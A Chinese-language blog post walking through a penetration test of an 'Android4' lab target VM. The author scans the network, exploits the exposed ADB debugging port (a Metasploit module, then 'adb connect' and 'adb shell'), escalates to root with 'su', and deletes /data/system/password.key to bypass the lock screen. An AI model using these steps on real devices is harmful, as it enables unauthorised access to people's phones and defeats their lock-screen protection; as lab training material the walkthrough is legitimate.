zoukankan      html  css  js  c++  java
  • 渗透测试实战-Android4靶机

    使用ip scanner扫描工具成功找到Android4靶机ip192.168.31.213

     直接找8080 http服务下手,访问如图

     

    根据页面提示 说留了个后门,使用御剑扫描目录发现dackdoor.php然而访问后是提示假的后门,那只能看看5555端口有什么漏洞了,然后最后通过谷歌发现是 adb 应用的服务端口,搜索adb的漏洞找到了 16年的一个 远程命令执行漏洞

     

     直接调用模块利用啊如图:

     接着set  lhostKaliIP 192.168.31.123set  rhosts AndroidIP 192.168.31.213最后run一下,如图

     

     发现没有反弹到shell,下一步我们就直接用adb 去链接他即可,如果没有adb的先安装一下使用命令sudo apt-get install adb,安装完后输入命令 adb connect 192.168.31.213:5555接着输入命令 adb shell 即可拿到shell

     

     下一步肯定是提权了,其实很简单只需输入 su 回车,即可直接拿到root shell, 如图:

     

    既然已经拿到root权限了,那我们得看看手机里有什么,但有密码,我们可以直接删掉key文件首先cd data/system找到password.key操作如图:

     

     使用rm password.key命令删除掉password.key文件

     

     发现不用密码直接进入手机系统

  • 相关阅读:
    git stash
    vim 使用
    git 分支管理
    git 日常使用
    js createElement
    git checkout
    2.2链表 链表中倒数第k个结点
    1.8字符串及分析 翻转子串
    全排列
    1.7数组 清除行列
  • 原文地址:https://www.cnblogs.com/xiaoerban/p/11097629.html
Copyright © 2011-2022 走看看